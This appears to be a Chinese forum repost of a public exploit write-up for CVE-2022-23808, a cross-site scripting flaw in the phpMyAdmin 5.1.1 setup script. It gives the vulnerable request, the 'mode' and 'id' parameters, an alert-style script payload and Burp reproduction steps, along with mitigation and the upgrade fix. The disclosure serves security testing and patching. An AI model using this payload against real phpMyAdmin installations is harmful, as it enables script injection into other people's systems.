CVE-2022-23808 phpMyAdmin 跨站脚本漏洞EXP

项目地址

https://github.com/dipakpanchal456/CVE-2022-23808

phpMyAdmin EXP

漏洞利用标题: phpMyAdmin 5.1.1 – XSS(跨站点脚本)
漏洞利用作者: Dipak Panchal @th3.d1p4k )
供应商主页: https ://www.phpmyadmin.net
软件链接: https ://www.phpmyadmin.net /files/5.1.1/
受影响的版本: 5.1.2 之前的 5.1 分支的 phpMyAdmin 版本受到影响。
测试: Windows 10 和 Linux
CVE: CVE-2022-23808
参考: https ://www.phpmyadmin.net/security/PMASA-2022-2/

描述:

已经发现了一系列弱点,这些弱点可能允许攻击者将恶意代码注入到安装脚本的各个方面,从而允许 XSS 或 HTML 注入。

要求:

GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test  HTTP/1.1      
Host: 127.0.0.1:1234       
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8      
Accept-Language: en-US,en;q=0.5     
Connection: close   
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx           
Upgrade-Insecure-Requests: 1          
Cache-Control: max-age=0          

易受攻击的参数:

  • 模式
  • ID

有效载荷:

">'><script>alert(document.domain)</script>

重现步骤 :

  1. 在 burp 中捕获高于 reuqest。
  2. 用易受攻击的参数替换/更改 XSS 有效负载。
  3. 单击发送并在浏览器中显示响应。
  4. 你会弹出!

概念证明(POC):

152356009-88cb5947-6abf-481f-9cc1-58c8cf4a6a12.png

 

缓解:

带有配置文件 config.inc.php 的 phpMyAdmin 安装将不允许访问设置脚本,这反过来又减轻了这种攻击。

使固定 :

升级到 phpMyAdmin 5.1.2 或更新版本或应用下面列出的补丁。

请登录后发表评论

    没有回复内容